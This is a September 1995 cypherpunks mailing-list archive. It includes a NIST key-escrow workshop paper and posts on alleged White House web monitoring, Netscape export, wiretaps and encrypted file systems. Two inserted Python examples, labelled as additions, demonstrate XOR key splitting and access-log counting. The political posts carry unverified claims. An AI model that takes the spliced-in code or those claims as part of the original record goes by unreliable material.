Developing Federal Key Escrow Encryption Standards Workshop
September 15, 1995

                        Discussion Paper

In announcements made on August 17, 1995, the Government stated
its intention to work with industry and other interested
individuals to develop federal key escrow encryption standards,
including those implementable in software.  This standard, when
developed and approved, will be used by federal agencies (and
others, if they so choose) in conjunction with FIPS-approved
encryption techniques.  

The structure of the envisioned standard(s), its technical
specificity, goals and objectives, important technical
considerations, and issues of process must be addressed in order
to move forward.  Some of the more technical issues include:

-    Is a standard interface for the release of keys desirable?

-    What documentation is required?

-    How will operational procedures be developed?

-    How will conformance be validated?

-    Will security be evaluated?  If so, under what criteria and
     by whom?

-    How will configuration control be maintained?

-    Are new FIPS-approved algorithms necessary?

-    Should escrowing be built into the Public Key
     Infrastructure?

-    Is a standard escrow system identification field needed?

-    Is split knowledge required?

-    Do systems which permit data to be encrypted for both
     storage and transmission need to provide for both types of
     escrow?

-    Does the government require special features (e.g., two hour
     access, continuous real-time decryption, etc.)?

-    Who will draft the standard?  Timeframe?

Note:  These issues will be discussed at the Key Escrow Standards
Development Workshop to be held September 15, 1995 (9:00 a.m. -
5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.  The meeting will be open to the public,
although seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail: carlton@micf.nist.gov.                      

9/6/95

----------------------------------------------------------------------------
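
The discussion paper's question "Is split knowledge required?" concerns dividing an escrowed key among several agents so that no single agent holds anything useful. The Python below is an added example, not part of the NIST paper or of the original message; the XOR n-of-n scheme, the check-value construction and every name in it are assumptions chosen for illustration.

```python
import hashlib
import hmac
import secrets
from typing import List, Tuple

# Constructed domain-separation label for the check value (assumption).
CHECK_LABEL = b"escrow-key-check-v1"


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("components must all have the key's length")
    return bytes(x ^ y for x, y in zip(a, b))


def check_value(key: bytes) -> str:
    """Short fingerprint stored beside the components to detect a bad
    recombination. Only suitable for high-entropy (random) keys."""
    return hashlib.sha256(CHECK_LABEL + key).hexdigest()[:16]


def split_key(key: bytes, agents: int) -> Tuple[List[bytes], str]:
    """Split `key` into one component per escrow agent.

    The first agents-1 components are uniformly random; the last is chosen
    so that the XOR of all components equals the key. Any subset smaller
    than the full set is statistically independent of the key.
    """
    if agents < 2:
        raise ValueError("split knowledge needs at least two agents")
    if not key:
        raise ValueError("empty key")
    components = [secrets.token_bytes(len(key)) for _ in range(agents - 1)]
    last = key
    for component in components:
        last = xor_bytes(last, component)
    components.append(last)
    return components, check_value(key)


def recombine(components: List[bytes], expected_check: str) -> bytes:
    """XOR all components together and verify the result.

    Raises ValueError if a component is missing or altered, so a release
    procedure fails closed instead of handing back a wrong key.
    """
    if not components:
        raise ValueError("no components supplied")
    key = components[0]
    for component in components[1:]:
        key = xor_bytes(key, component)
    if not hmac.compare_digest(check_value(key), expected_check):
        raise ValueError("recombined value does not match the check value")
    return key


def demo() -> dict:
    """Run the split and recombination on a constructed 128-bit key."""
    key = secrets.token_bytes(16)          # constructed sample key
    components, check = split_key(key, 3)  # three hypothetical agents
    outcome = {"all_three_recover_key": recombine(components, check) == key}

    # Two of three agents cooperating must not be able to release the key.
    try:
        recombine(components[:2], check)
        outcome["two_of_three_rejected"] = False
    except ValueError:
        outcome["two_of_three_rejected"] = True

    # A single flipped bit in one component must be detected.
    tampered = list(components)
    tampered[2] = xor_bytes(tampered[2], b"\x01" + bytes(15))
    try:
        recombine(tampered, check)
        outcome["tampering_detected"] = False
    except ValueError:
        outcome["tampering_detected"] = True
    return outcome


if __name__ == "__main__":
    print(demo())
```

Because every component is required, losing one component loses the key; a threshold scheme would be needed to tolerate an unavailable agent.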




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lindat@iquest.net (Linda Thompson, American Justice Federation)
Date: Tue, 12 Sep 95 14:07:34 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <m0ssbX5-00062kC@dorite1.iquest.net>
MIME-Version: 1.0
Content-Type: text/plain



>To: cypherpunks@toad.com
>From: an215712@anon.penet.fi
>X-Anonymously-To: cypherpunks@toad.com
>Organization: Anonymous forwarding service
>Reply-To: an215712@anon.penet.fi
>Date: Tue, 12 Sep 1995 17:17:15 UTC
>Subject: Whitehouse "dissident" web site monitoring?
>
>- ----------------------------------------------------------
>
>      WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>
>
>    The  National  Security   Agency   presumably   can   monitor
>subversive  communication  on  the  Internet  without leaving any
>trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
>political  purposes, however, the White House may be forced to do
>the monitoring in-house,  which  means  that  they  leave  traces
>everywhere they go.
>
>    With  just  a  superficial  search  for  such   traces,   The
>Washington   Weekly   has   uncovered   intensive  monitoring  of
>"dissident" Internet sites by the White House.
>
>    It turns out that computers from inside the White House  have
>kept  pretty  good  tabs  on information available on Whitewater,
>Vince Foster, and Mena at a few key repositories  on  the  World-
>Wide Web, a subset of the Internet.
>
>    Just  three  such  sites:  "The   Washington   Weekly,   "The
>Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
>were accessed 128 times by  four  computers  from  the  Executive
>Office  of the President between August 28 and August 31.  If the
>White House is showing a similar interest in other sites  on  the
>World  Wide  Web,  that would amount to a monitoring operation of
>considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
>index  says  that his company alone has indexed approximately 725
>political  sites.  That  monitoring  effort  would  be   nothing,
>however,  compared  to  the  effort  required to follow all anti-
>Clinton discussion on the Usenet, another subset of the Internet.
>
>    The White House did  not  respond  to  an  inquiry  (attached
>below)   asking  for  an  explanation  and  asking  whether  this
>constituted "casual browsing."
>
>    Interestingly, the week after the  White  House  snooping  of
>files,  which included a series of articles by J. Orlin Grabbe on
>Vince Foster's ties  to  the  NSA,  the  following  little  piece
>appeared in Newsweek Magazine:
>
>  "Conspiracy theorists perked up when Deborah Gorham told Senate
>  Whitewater investigators in June that her boss, the late deputy
>  White House counsel Vince Foster, asked her  to  put two secret
>  notebooks  from  the  National Security Agency in a White House
>  safe. The suggestion that  Foster  dealt  with  the NSA sparked
>  feverish  speculation  on the  Internet that he was involved in
>  espionage. The reality appears more prosaic.  The  White  House
>  won't give details,  but  sources say Foster's files dealt with
>  legal questions about national emergencies...."
====================================================

During the Waco Hearings, Charles Schumer said he'd seen Foster's missing
file and all it had in it was a memorandum about "Linda Thompson and THAT tape."

Now, put that with the "sources say Foster's files dealt with legal
questions about national emergencies . . . ." and I will presume that "THAT
tape" and I constitute a "national emergency."

Harumph.

At any rate, we've (AEN News) had a number of military-based sniffs here.

-- Linda

================================================

>    Does the White House follow anti-Clinton discussion on Usenet
>newsgroups just as closely?  The White House posts press releases
>to Usenet in collaboration with the Artificial  Intelligence  Lab
>at   Massachusetts   Institute  of  Technology.  But  MIT  System
>Administrator Bruce Walton says that the White House does not use
>the  same  server  for  reading netnews.  It would be difficult -
>although not impossible - to find the server that the White House
>uses  for  reading  or  receiving netnews and check for traces on
>that server.
>
>    Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a  criminal
>offense.  But  Usenet  just might be a faster conduit for getting
>the attention of the administration than the email  address  that
>the White House has published for the president.
>
>Attachment:
>
>
>                      THE WASHINGTON WEEKLY
>_________________________________________________________________
>
>August 31, 1995
>
>Virginia M. Terzano
>White House Office of the Press Secretary
>The White House
>
>
>Dear Ms. Terzano:
>
>    It has come to my attention that several dissident  sites  on
>the  World  Wide  Web  have been visited by White House computers
>this week.  Apparently,  all  information  regarding  Whitewater,
>Foster, and Mena has been transferred to White House computers.
>
>    Specifically, the sites,  
>
>"Washington Weekly" (http://www.federal.com),  
>"The Whitewater Scandal Home Page"
>(http://www.cs.dartmouth.edu/~crow/whitewater/)
>"Whitewater & Vince Foster" 
>(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
>
>have  been  visited  by  White  House   computers   ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been  transferred
>to those White House computers. For all sites, this constitutes a
>significant  increase  over  previous  access  by   White   House
>computers.
>
>    In light of this information, I have the following questions:
>
>(1) Does this constitute "casual browsing" by White House staff, or
>    is it, in light of the considerable time and effort spent during 
>    regular business hours, part of a monitoring or intelligence operation?
>
>(2) For what purpose is the information transferred to the White House used?
>
>(3) Does the White House keep information from these web sites on file,
>    and does the White House keep a file on the persons responsible for
>    these web sites?
>
>(4) Is the April 9 statement by David Lytel of the White House Office of
>    Science and Technology to Amy Bauer of Copley News Service that the
>    administration does not monitor anti-Clinton activity on the web still
>    operative?
>
>
>    Thank you very much for your cooperation in this matter.
>
>Sincerely,
>
>Marvin Lee
>The Washington Weekly
>
>Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
>
>
>
Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie" "America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN  46203
Telephone:  (317) 780-5200
Fax:  (317) 780-5209
Internet:  lindat@iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear
to shut his mind and close his mouth, then all Americans are in peril."
Harry Truman






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Tue, 12 Sep 95 13:08:34 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
Message-ID: <199509122007.NAA17074@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


As fast as it takes to FTP it over there.
I have copies of every server Netscape's got,
although I haven't unpacked them or used them.

Will this take up another 75 megs on the HD?

Lover Always,

Carol Anne.....dreaming of her own web server someday.

>| Meanwhile, in an as yet unannounced move, the company said it would place 
>| its commercial browser online for free downloading. [..] The commercial
>| version, sold only in the U.S. contains an unbreakable 128-bit
>| encryption scheme. 

>Ok, any bet on how long it will take?
>
>/Christian
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 12 Sep 95 13:25:26 PDT
To: cypherpunks@toad.com
Subject: Secure Device 1.4 (secdr14.zip)
Message-ID: <199509122327.SAA25529@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear fellow Cypherpunks, Could someone send me Secure Device 1.4 
(Secdr14.zip) ? My ftp software won't accept the huge directory path needed 
to point at the package on U.S. servers. I am an American citizen at an 
American site who knows the export regulations. Thank You, Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 12 Sep 95 15:48:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
Message-ID: <199509122248.PAA21902@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 9/12/95 +0200, you wrote:
>>| Netscape said it received word last week that the State Department had 
>>| cleared that version for release on the Net, but only within the U.S., 
>>| owing to current export laws banning the export of encryption schemes 
>>| stronger than 40 bits.  The company could provide no details by press 
>>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>>| U.S. borders.
>>
>>Ok, any bet on how long it will take?
>
>It's already been exported.  Evidently, one of those who bought the commercial
>version sent it to Europe as soon as it was out.

The Netscape "personal edition" was available in Europe on some store
shelves soon after its release.  (The PE edition of netscape has the 128
bit encryption.)

As for what Netscape will do in this case...  They had made plans to release
the 128 bit version in a method similar to what MIT uses, but they found
that they could actually get people to buy a copy if they kept that one as
only available by ordering it.  (Who says that people will not pay for
encryption?)  Now all they need to do is come out with a version with a
bigger key. (Hint, hint...)

I will keep my personal feelings about Netscape to a minimum here.  There
are certain things that they do well and there are others they do not.  But
those problems will continue to be forwarded to Dave Null... 

Well, on to more profitable things.



>
>I note the site removed it, however, probably because Netscape Comm. Inc.
>requested that they do so.  Netscape generally objects to anyone else
>carrying their browser (.edu sites with prior permission excepted).
>
>
>
>
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Tue, 12 Sep 95 15:06:04 PDT
To: bbruce@csn.net
Subject: Leaked NSI PR About $50-Annual-Fee-for-Domain-Name
Message-ID: <v02130507ac7bae1c3f04@[199.117.100.8]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a pointer to a very interesting draft press release, apparently scheduled for release on 18 September 1995.

Short version:  The article specifies $100 one-time fee for new domain name registrations, and a $50/year annual fee for all .com, .edu, .gov, .net, and .org domains.

Long version:
> From: rpwhite@best.com (rpwhite)
> Newsgroups: best.general,best.announce,best.www,ba.internet,comp.protocols.tcp-ip.domains,talk.bizarre
> Subject: INTERNET BEGINS FEE-BASED REGISTRATION
> Date: 12 Sep 1995 12:18:18 -0700
> Organization: BEST Internet (415) 964-2378
> Lines: 495
> Approved: dillon@best.com
> Message-ID: <434mdq$c3r@shell1.best.com>
> NNTP-Posting-Host: shell1.best.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 12 Sep 95 16:07:16 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <Pine.D-G.3.91.950912174515.23949C-100000@dg.thepoint.net>
Message-ID: <199509122307.QAA02486@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Brian Davis <bdavis@thepoint.net> writes:
> No question.  Many high profile public corruption, Mafia, and high-level...
> ...In our district, we managed to convict almost 20 people...
> Particularly effective were the court-approved video and audio tapes of...

> I don't doubt that wiretaps may sometimes be abused despite the 
> incredibly onerous review process, but they have positive aspects, too.

In how many of these cases did you fail to get the necessary information
because of encryption?  Has this proportion been changing over the years?

	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 23:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 15:27:02 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 9/17, 2 pm
Message-ID: <wYgVwkkAsiuL084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll congregate at the food court in the basement of
the Tivoli, near the confluence of Larimer St., Speer Blvd., and
the Auraria Parkway, and perhaps drift off to nearby libraries or
restaurants after an hour or two.  Email for directions or more
info.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I *swear* I have not used the term 'big-endian' in the last 10 years.

iQCVAwUBMFYHkFRRFMq4NZY5AQGuGwQAmOqG0gpZHlUsmQxHcCfA2Hg30LQH9FXN
xgz+gZuMWLFDNIZp/5bmodK18B4NpE4AtJH9QhA8kngb11/onVAu8aiw/EFGbTyT
yHF2NVN20gGOGAYbeJzpUWHnJhPUB9QYszdwc8K0VvDtYfxq/H8mDfgDiGjNenCG
z8ryBpKWYkQ=
=cscS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 13:51:22 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509122051.QAA14953@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by Andrew.Spring@ping.be (Andrew Spring) on 
Tue, 12 Sep  7:3  PM

>A more cautious conclusion would be that the 
>importance (to the  LEA's) of the busts made with 
>crypto is much larger than the numbers  suggest.  You 
>could interpret that a lot of ways:  I suspect that  
>high-profile career-enhancing cases are highly 
>dependent on wiretaps.


   In response to an audience question about wiretaps and
   crypto, Mr. Michael Nelson of the White House said at the
   NIST GAK meeting (paraphrased):

      We are not concerned with bad people using crypto among
      themselves, we can handle that. We are more concerned
      with their using crypto to communicate with regular
      folks, to make legitimate arrangements -- finance,
      supplies, travel, and so on -- for their nefarious
      deeds. It's the intermix of the bad with the good that's
      the problem.

   Maybe someone else at the meeting heard this differently
   and will comment, but this seems to mean that the Feds can
   track, and maybe crack, the crypto-intercomm of "bad
   people" so long as it is not buried in a torrent of public
   crypto use. And not commingled with lawful, ECPA-
   protected(?), communication.

   Anybody want to elaborate what Mr. Nelson was implying
   about wiretaps and crypto?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 12 Sep 95 08:27:12 PDT
To: cypherpunks@toad.com
Subject: Re: Elliptic Curve Public Key Crypto available
Message-ID: <9509121500.AA03172@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Available anywhere outside the escrowed country ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 12 Sep 95 15:13:00 PDT
To: Tom Rollins <kelso@netcom.com>
Subject: Re: Scientology tries to break PGP - and (fwd)
In-Reply-To: <199509122056.NAA19963@netcom19.netcom.com>
Message-ID: <Pine.SUN.3.90.950912170953.15984A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


In that case you must try CFS or Crypto File System. Not implemented in a 
partition or in the kernel like SFS but as a user level loopback NFS server.
It's quite nice.

Aleph One / aleph1@dfw.net
http://underground.org/

On Tue, 12 Sep 1995, Tom Rollins wrote:

> Date: Tue, 12 Sep 1995 13:56:18 -0700 (PDT)
> From: Tom Rollins <kelso@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Scientology tries to break PGP - and (fwd)
> 
> > 	I would just like to point out that, when a LEA comes to you
> > to get at the contents of your computer, (s)he is not going to
> > patiently wait while your system wipes the offending evidence off your
> > hard disk.  The first thing they do is make a copy of everything, so
> > they can work from the copy.  Besides, you do have backup tapes laying
> > around all over the place, don't you?
>  
> Sounds like a recommendation for SFS (Secure File System).
> It encrypts everything going to the disk.
> I used an SFS partition for a while.  But, I swap between
> DOS and Linux.  Haven't seen SFS for Linux yet.
>  
> Later,
> Tom <kelso@netcom.com>
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 12 Sep 95 10:50:29 PDT
To: cypherpunks@toad.com
Subject: Whitehouse "dissident" web site monitoring?
Message-ID: <9509121717.AA03226@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



- ----------------------------------------------------------

      WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET


    The  National  Security   Agency   presumably   can   monitor
subversive  communication  on  the  Internet  without leaving any
trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
political  purposes, however, the White House may be forced to do
the monitoring in-house,  which  means  that  they  leave  traces
everywhere they go.

    With  just  a  superficial  search  for  such   traces,   The
Washington   Weekly   has   uncovered   intensive  monitoring  of
"dissident" Internet sites by the White House.

    It turns out that computers from inside the White House  have
kept  pretty  good  tabs  on information available on Whitewater,
Vince Foster, and Mena at a few key repositories  on  the  World-
Wide Web, a subset of the Internet.

    Just  three  such  sites:  "The   Washington   Weekly,   "The
Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
were accessed 128 times by  four  computers  from  the  Executive
Office  of the President between August 28 and August 31.  If the
White House is showing a similar interest in other sites  on  the
World  Wide  Web,  that would amount to a monitoring operation of
considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
index  says  that his company alone has indexed approximately 725
political  sites.  That  monitoring  effort  would  be   nothing,
however,  compared  to  the  effort  required to follow all anti-
Clinton discussion on the Usenet, another subset of the Internet.

    The White House did  not  respond  to  an  inquiry  (attached
below)   asking  for  an  explanation  and  asking  whether  this
constituted "casual browsing."

    Interestingly, the week after the  White  House  snooping  of
files,  which included a series of articles by J. Orlin Grabbe on
Vince Foster's ties  to  the  NSA,  the  following  little  piece
appeared in Newsweek Magazine:

  "Conspiracy theorists perked up when Deborah Gorham told Senate
  Whitewater investigators in June that her boss, the late deputy
  White House counsel Vince Foster, asked her  to  put two secret
  notebooks  from  the  National Security Agency in a White House
  safe. The suggestion that  Foster  dealt  with  the NSA sparked
  feverish  speculation  on the  Internet that he was involved in
  espionage. The reality appears more prosaic.  The  White  House
  won't give details,  but  sources say Foster's files dealt with
  legal questions about national emergencies...."


    Does the White House follow anti-Clinton discussion on Usenet
newsgroups just as closely?  The White House posts press releases
to Usenet in collaboration with the Artificial  Intelligence  Lab
at   Massachusetts   Institute  of  Technology.  But  MIT  System
Administrator Bruce Walton says that the White House does not use
the  same  server  for  reading netnews.  It would be difficult -
although not impossible - to find the server that the White House
uses  for  reading  or  receiving netnews and check for traces on
that server.

    Readers may be tempted to post a threat to the President on a
newsgroup just to see if they get a visit from the Secret Service
the next day. That experiment is not advisable. It is a  criminal
offense.  But  Usenet  just might be a faster conduit for getting
the attention of the administration than the email  address  that
the White House has published for the president.





Attachment:



                      THE WASHINGTON WEEKLY
_________________________________________________________________

August 31, 1995

Virginia M. Terzano
White House Office of the Press Secretary
The White House


Dear Ms. Terzano:

    It has come to my attention that several dissident  sites  on
the  World  Wide  Web  have been visited by White House computers
this week.  Apparently,  all  information  regarding  Whitewater,
Foster, and Mena has been transferred to White House computers.

    Specifically, the sites,  

"Washington Weekly" (http://www.federal.com),  
"The Whitewater Scandal Home Page"
(http://www.cs.dartmouth.edu/~crow/whitewater/)
"Whitewater & Vince Foster" 
(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)

have  been  visited  by  White  House   computers   ist1.eop.gov,
ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
28 and August 31, and a total of 128 files have been  transferred
to those White House computers. For all sites, this constitutes a
significant  increase  over  previous  access  by   White   House
computers.

    In light of this information, I have the following questions:

(1) Does this constitute "casual browsing" by White House staff, or
    is it, in light of the considerable time and effort spent during 
    regular business hours, part of a monitoring or intelligence operation?

(2) For what purpose is the information transferred to the White House used?

(3) Does the White House keep information from these web sites on file,
    and does the White House keep a file on the persons responsible for
    these web sites?

(4) Is the April 9 statement by David Lytel of the White House Office of
    Science and Technology to Amy Bauer of Copley News Service that the
    administration does not monitor anti-Clinton activity on the web still
    operative?


    Thank you very much for your cooperation in this matter.

Sincerely,

Marvin Lee
The Washington Weekly




Copyright (c) 1995 The Washington Weekly (http://www.federal.com)


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.
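
The tally the letter above describes (transfers to hosts under one domain inside a date window, compared with earlier access) is the kind of figure a site operator reads out of a web server access log. The following is an added example, not part of the original post and not The Washington Weekly's own method; it assumes Common Log Format with reverse-resolved client names, and the log lines, paths and example.net/example.com hosts are constructed.

```python
import re
from collections import Counter
from datetime import date, datetime

# Common Log Format: host ident user [timestamp] "request" status bytes
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)
IPV4 = re.compile(r'^\d{1,3}(\.\d{1,3}){3}$')


def in_domain(host, domain):
    """True only if host is the domain itself or a name beneath it."""
    host, domain = host.lower().rstrip("."), domain.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def parse_line(line):
    """Return (host, day, status) for a well-formed line, else None."""
    m = CLF.match(line.strip())
    if m is None:
        return None
    try:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return m["host"].lower(), ts.date(), int(m["status"])


def summarize(lines, domain, start, end):
    """Count successful transfers to hosts under `domain`.

    per_host   - 2xx responses per host with start <= day <= end
    baseline   - 2xx responses to the same domain before `start`
    unparsed   - lines that are not valid Common Log Format
    unresolved - lines logged with a bare IPv4 address; a name-based
                 tally cannot attribute these to any domain
    """
    per_host = Counter()
    baseline = unparsed = unresolved = 0
    for line in lines:
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1
            continue
        host, day, status = rec
        if IPV4.match(host):
            unresolved += 1
            continue
        if not in_domain(host, domain) or not 200 <= status < 300:
            continue
        if start <= day <= end:
            per_host[host] += 1
        elif day < start:
            baseline += 1
    return {
        "per_host": dict(per_host),
        "in_window": sum(per_host.values()),
        "baseline": baseline,
        "unparsed": unparsed,
        "unresolved": unresolved,
    }


# Constructed sample log. The eop.gov host names are the ones named in the
# letter; every timestamp, path, size and other host is made up.
SAMPLE_LOG = """\
ist1.eop.gov - - [21/Aug/1995:10:02:11 -0400] "GET /index.html HTTP/1.0" 200 4312
dialup12.example.net - - [28/Aug/1995:09:15:40 -0400] "GET /index.html HTTP/1.0" 200 4312
ist1.eop.gov - - [28/Aug/1995:11:20:05 -0400] "GET /index.html HTTP/1.0" 200 4312
ist1.eop.gov - - [28/Aug/1995:11:20:31 -0400] "GET /issue35.html HTTP/1.0" 200 18220
IST6.EOP.GOV - - [29/Aug/1995:14:03:57 -0400] "GET /issue35.html HTTP/1.0" 200 18220
gatekeeper.eop.gov - - [30/Aug/1995:16:45:09 -0400] "GET /missing.html HTTP/1.0" 404 -
gatekeeper.eop.gov - - [31/Aug/1995:08:30:22 -0400] "GET /issue36.html HTTP/1.0" 200 20114
eop.gov.example.com - - [31/Aug/1995:08:31:00 -0400] "GET /index.html HTTP/1.0" 200 4312
192.0.2.7 - - [31/Aug/1995:12:00:00 -0400] "GET /index.html HTTP/1.0" 200 4312
ist7.eop.gov - - [01/Sep/1995:09:00:00 -0400] "GET /index.html HTTP/1.0" 200 4312
this line is truncated garbage
"""

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG.splitlines(), "eop.gov",
                       date(1995, 8, 28), date(1995, 8, 31))
    for key, value in report.items():
        print(f"{key}: {value}")
```

The count is only as good as the logged name: it depends on the server performing reverse DNS, and one logged host name says nothing about how many people sat behind it.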




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 12 Sep 95 11:06:11 PDT
To: cypherpunks@toad.com
Subject: Whitehouse responds to Zimmermann pardon letter
Message-ID: <9509121750.AA19433@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 14:45:29 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <v01510100ac7a4e673a66@[193.74.217.13]>
Message-ID: <Pine.D-G.3.91.950912174515.23949C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Andrew Spring wrote:

> >intercepts requested and authorized in the past year.  As I recall, the
> >number was quite small - around 12K [?].  Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
> 
> I think it's about 1200.
> 
> >not a large number, anyway.  I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
> 
> A more cautious conclusion would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest.  You could interpret that a lot of ways:  I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

No question.  Many high profile public corruption, Mafia, and high-level 
narcotics trafficking cases are made with wiretaps.  In our district, we 
managed to convict almost 20 people in an investigation of the state 
legislature, including the now-former Speaker of the House and > 6 other 
legislators.  Bribing lobbyists took hits, etc.

Particularly effective were the court-approved video and audio tapes of 
the Speaker taking a bribe in exchange for certain action on legislation 
and responding to the bribing party:   "Well bless your heart."
That has become the office's mantra.

I understand the same was true of the South Carolina state legislature 
investigation (wiretaps). 

A number of previous investigations of our legislature failed over the 
past 15 years as the stonewall held.  Wiretaps, hidden microphones, and 
hidden cameras put corrupt politicians (I know - redundant) out of business.

I don't doubt that wiretaps may sometimes be abused despite the 
incredibly onerous review process, but they have positive aspects, too.

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 17:39:33 PDT
To: Peter Trei <trei@process.com>
Subject: Re: Digital Fingerprinting
